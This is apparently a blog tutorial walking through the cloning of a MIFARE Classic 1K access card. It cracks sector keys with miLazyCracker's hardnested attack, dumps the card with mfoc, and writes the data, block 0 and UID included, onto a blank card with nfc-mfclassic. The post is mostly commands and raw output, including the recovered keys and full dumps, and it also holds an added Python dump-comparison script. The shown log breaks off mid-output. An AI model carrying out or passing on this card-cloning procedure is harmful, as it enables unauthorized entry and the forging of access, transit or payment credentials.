miLazyCracker – Hack Mifare 1K Classic (mfcuk, mfoc)

Link to Part1

1.

miLazyCracker

Found key: 81cc25ebbb6a

Found key: 3e65e4fb65b3

If the device LED turns red, replug the reader right away (No NFC device found.)

Otherwise the program aborts.

2.

Mfoc download: https://github.com/nfc-tools/mfoc/releases

Take a dump of the card once you know key A and key B from step 1:

mfoc -O carddump.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a

 

With default keys (not changed, fresh card): mfoc -O carddump.dmp

 

3.

You need the dump of the original card (step 1) and the dump of the card that will receive the original card's values (the clone card):

nfc-mfclassic w a u DUMPORIGINALCARD DUMPCLONECARD

Both dumps were made as in step 2.

 

Mathiass-MBP:dump mathias$ nfc-mfclassic w a u original.dmp clone.dmp
NFC reader: ACS ACR122U / ACR122U214 opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 04
 UID (NFCID1): 7b 78 32 3c
 SAK (SEL_RES): 08
Guessing size: seems to be a 1024-byte card
Writing 64 blocks |...............................................................|
Done, 63 of 64 blocks written.

 

4. Check whether the cards are the same

First the original, then the clone.

The UIDs turn out to be different:

Mathiass-MBP:mifare mathias$ nfc-list
nfc-list uses libnfc libnfc-1.7.1-191-g216145f
NFC device: ACS ACR122U / ACR122U214 opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08

Mathiass-MBP:mifare mathias$ nfc-list
nfc-list uses libnfc libnfc-1.7.1-191-g216145f
NFC device: ACS ACR122U / ACR122U214 opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 04
 UID (NFCID1): 7b 78 32 3c
 SAK (SEL_RES): 08

 

Check the contents:

mfoc -O original.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a

mfoc -O clone.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a

Mathiass-MBP:dump mathias$ hexdump -vC clone.dmp > clone.hex
Mathiass-MBP:dump mathias$ hexdump -vC original.dmp > original.hex
Mathiass-MBP:dump mathias$ diff clone.hex original.hex

Mathiass-MBP:dump mathias$ diff original.hex test.hex
1c1
< 00000000 04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00 |.....Y..D.. ....|
---
> 00000000 7b 78 32 3c 0d 08 04 00 01 6f 01 6d 45 68 f8 1d |{x2<.....o.mEh..|

 

Now you can see that only the first block, which holds the card's UID, differs.
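The hexdump/diff comparison from step 4, done per 16-byte block, as an added example that is not part of the original post: it reports which block of which sector differs and what kind of block it is, checks the BCC of a 4-byte-UID block 0, and goes one step further by decoding a sector trailer's access bits. The two dumps are constructed from the block 0, key and trailer values printed on this page; all function names are made up for this example.

```python
from dataclasses import dataclass

BLOCK_SIZE = 16
BLOCKS_PER_SECTOR = 4
CARD_BLOCKS = 64  # MIFARE Classic 1K: 16 sectors x 4 blocks = 1024 bytes


@dataclass(frozen=True)
class BlockDiff:
    block: int
    sector: int
    kind: str  # "manufacturer", "data" or "trailer"
    left: bytes
    right: bytes


def split_blocks(dump: bytes) -> list:
    """Cut a 1K dump into its 64 blocks; reject files of any other size."""
    if len(dump) != BLOCK_SIZE * CARD_BLOCKS:
        raise ValueError(f"expected 1024 bytes, got {len(dump)}")
    return [dump[i:i + BLOCK_SIZE] for i in range(0, len(dump), BLOCK_SIZE)]


def block_kind(block: int) -> str:
    """Block 0 holds the UID; the last block of each sector is its trailer."""
    if block == 0:
        return "manufacturer"
    if block % BLOCKS_PER_SECTOR == BLOCKS_PER_SECTOR - 1:
        return "trailer"
    return "data"


def diff_dumps(left: bytes, right: bytes) -> list:
    """Return one BlockDiff per block whose 16 bytes differ."""
    pairs = zip(split_blocks(left), split_blocks(right))
    return [
        BlockDiff(n, n // BLOCKS_PER_SECTOR, block_kind(n), a, b)
        for n, (a, b) in enumerate(pairs)
        if a != b
    ]


def bcc_ok(block0: bytes) -> bool:
    """4-byte-UID layout only: byte 4 must be the XOR of UID bytes 0..3."""
    return (block0[0] ^ block0[1] ^ block0[2] ^ block0[3]) == block0[4]


def access_bits(trailer: bytes) -> list:
    """Return (C1, C2, C3) for blocks 0..3 of a sector.

    Bytes 6..8 of the trailer store every access bit twice, once inverted;
    a trailer whose two copies disagree is rejected.
    """
    b6, b7, b8 = trailer[6], trailer[7], trailer[8]
    c1, c2, c3 = b7 >> 4, b8 & 0x0F, b8 >> 4
    inv_c1, inv_c2, inv_c3 = b6 & 0x0F, b6 >> 4, b7 & 0x0F
    if (c1 ^ inv_c1, c2 ^ inv_c2, c3 ^ inv_c3) != (0xF, 0xF, 0xF):
        raise ValueError("access bits fail their complement check")
    return [((c1 >> i) & 1, (c2 >> i) & 1, (c3 >> i) & 1) for i in range(4)]


def make_dump(block0_hex: str) -> bytes:
    """Constructed sample dump: block 0 as given, zeroed data blocks, and the
    key/trailer layout from the mfoc output (sectors 4-14 use the custom keys)."""
    default = bytes.fromhex("ffffffffffff ff078069 ffffffffffff")
    custom = bytes.fromhex("3e65e4fb65b3 78778869 81cc25ebbb6a")
    blocks = [bytes(BLOCK_SIZE)] * CARD_BLOCKS
    blocks[0] = bytes.fromhex(block0_hex)
    for sector in range(CARD_BLOCKS // BLOCKS_PER_SECTOR):
        trailer_block = sector * BLOCKS_PER_SECTOR + 3
        blocks[trailer_block] = custom if 4 <= sector <= 14 else default
    return b"".join(blocks)


# Block 0 values copied from the diff output above; everything else is constructed.
ORIGINAL = make_dump("04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00")
CLONE = make_dump("7b 78 32 3c 0d 08 04 00 01 6f 01 6d 45 68 f8 1d")

if __name__ == "__main__":
    for d in diff_dumps(ORIGINAL, CLONE):
        print(f"block {d.block:02d} (sector {d.sector:02d}, {d.kind}):")
        print(f"  < {d.left.hex(' ')}")
        print(f"  > {d.right.hex(' ')}")
    print("clone block 0 BCC valid:", bcc_ok(split_blocks(CLONE)[0]))
    for block in (3, 19):
        print(f"trailer block {block:02d} access bits:",
              access_bits(split_blocks(ORIGINAL)[block]))
```

With real files, read both dumps with `open(path, "rb").read()` and pass the bytes to `diff_dumps`.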

 

5.

Also overwrite block 0:

nfc-mfclassic W a original.dmp clone.dmp

 

Mathiass-MBP:check mathias$ mfoc -O clone.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
The custom key 0x3e65e4fb65b3 has been added to the default keys
The custom key 0x81cc25ebbb6a has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): 7b 78 32 3c
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: 3e65e4fb65b3] -> [....///////////.]
[Key: 81cc25ebbb6a] -> [....xxxxxxxxxxx.]
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
[Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
[Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
[Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
[Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
[Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
[Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
[Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
[Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
[Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
[Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 05 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 06 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 07 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 08 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 09 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 10 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 11 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 12 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 13 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 14 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff

We have all sectors encrypted with the default keys..

Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 55, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 54, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 53, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 52, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 51, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 50, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 49, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 48, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 47, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 46, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 45, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 44, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 43, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 42, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 41, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 40, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 39, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 38, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 37, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 36, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 35, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 34, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 33, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 32, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 31, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 30, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 29, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 28, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 27, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 26, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 25, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 24, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 23, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 22, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
Block 21, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 80
Block 20, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 00 00 00 80
Block 19, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 18, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
Block 17, type A, key 3e65e4fb65b3 :00 59 32 8a 5a 1e d8 fd 00 05 80 0b 00 00 00 0e
Block 16, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 5a 21 bf 44
Block 15, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 14, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 13, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 12, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 11, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 10, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 09, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 08, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 07, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 06, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 05, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 03, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 02, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 01, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 00, type A, key ffffffffffff :7b 78 32 3c 0d 08 04 00 01 6f 01 6d 45 68 f8 1d
Mathiass-MBP:check mathias$ mfoc -O original.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
The custom key 0x3e65e4fb65b3 has been added to the default keys
The custom key 0x81cc25ebbb6a has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 44
* UID size: double
* bit frame anticollision supported
UID (NFCID1): 04 e8 f9 c2 a5 59 80
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (7 Byte UID) 2K, Security level 1
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: 3e65e4fb65b3] -> [....///////////.]
[Key: 81cc25ebbb6a] -> [....xxxxxxxxxxx.]
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
[Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
[Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
[Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
[Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
[Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
[Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
[Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
[Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
[Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
[Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 05 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 06 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 07 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 08 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 09 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 10 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 11 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 12 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 13 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 14 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff

We have all sectors encrypted with the default keys..

Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 55, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 54, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 53, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 52, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 51, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 50, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 49, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 48, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 47, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 46, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 45, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 44, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 43, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 42, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 41, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 40, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 39, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 38, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 37, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 36, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 35, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 34, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 33, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 32, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 31, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 30, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 29, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 28, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 27, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 26, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 25, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 24, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 23, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 22, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
Block 21, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 80
Block 20, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 00 00 00 80
Block 19, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 18, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
Block 17, type A, key 3e65e4fb65b3 :00 59 32 8a 5a 1e d8 fd 00 05 80 0b 00 00 00 0e
Block 16, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 5a 21 bf 44
Block 15, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 14, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 13, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 12, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 11, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 10, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 09, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 08, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 07, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 06, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 05, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 03, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 02, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 01, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 00, type A, key ffffffffffff :04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00
Mathiass-MBP:check mathias$

 

Mathiass-MBP:mifare mathias$ miLazyCracker
 Found Mifare Classic 1k tag
 ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
 * UID size: double
 * bit frame anticollision supported
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08
 * Not compliant with ISO/IEC 14443-4
 * Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
 * MIFARE Classic 1K
 * MIFARE Plus (7 Byte UID) 2K, Security level 1
 Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
 Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
 [Key: ffffffffffff] -> [xxxx...........x]
 [Key: a0a1a2a3a4a5] -> [xxxx...........x]
 [Key: d3f7d3f7d3f7] -> [xxxx...........x]
 [Key: 000000000000] -> [xxxx...........x]
 [Key: b0b1b2b3b4b5] -> [xxxx...........x]
 [Key: 4d3a99c351dd] -> [xxxx...........x]
 [Key: 1a982c7e459a] -> [xxxx...........x]
 [Key: aabbccddeeff] -> [xxxx...........x]
 [Key: 714c5c886e97] -> [xxxx...........x]
 [Key: 587ee5f9350f] -> [xxxx...........x]
 [Key: a0478cc39091] -> [xxxx...........x]
 [Key: 533cb6c723f6] -> [xxxx...........x]
 [Key: 8fd0a4f256e9] -> [xxxx...........x]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 04 - Unknown Key A Unknown Key B
 Sector 05 - Unknown Key A Unknown Key B
 Sector 06 - Unknown Key A Unknown Key B
 Sector 07 - Unknown Key A Unknown Key B
 Sector 08 - Unknown Key A Unknown Key B
 Sector 09 - Unknown Key A Unknown Key B
 Sector 10 - Unknown Key A Unknown Key B
 Sector 11 - Unknown Key A Unknown Key B
 Sector 12 - Unknown Key A Unknown Key B
 Sector 13 - Unknown Key A Unknown Key B
 Sector 14 - Unknown Key A Unknown Key B
 Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff

Using sector 00 as an exploit sector
 Card is not vulnerable to nested attack
 MFOC not possible, detected hardened Mifare Classic
 Trying HardNested Attack...
 libnfc_crypto1_crack ffffffffffff 60 B 56 B mfc_04e8f9c2a55980_foundKeys.txt
 Found tag with uid c2a55980, collecting nonces for key B of block 56 (sector 14) using known key B ffffffffffff for block 60 (sector 15)
 Collected 1909 nonces... leftover complexity 1186294334976 (~2^40.11) - press enter to start brute-force phase

Collected 1919 nonces... leftover complexity 1186294334976 (~2^40.11) - initializing brute-force phase...
 Starting 8 threads to test 1186294334976 states using 256-way bitslicing
 Cracking... 47.72%
 Found key: 81cc25ebbb6a
 Tested 566767883890 states
 81cc25ebbb6a
 mfoc -f mfc_04e8f9c2a55980_foundKeys.txt -O mfc_04e8f9c2a55980_dump.mfd -D mfc_04e8f9c2a55980_unknownMfocSectorInfo.txt
 The custom key 0x81cc25ebbb6a has been added to the default keys
 Found Mifare Classic 1k tag
 ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
 * UID size: double
 * bit frame anticollision supported
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08
 * Not compliant with ISO/IEC 14443-4
 * Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
 * MIFARE Classic 1K
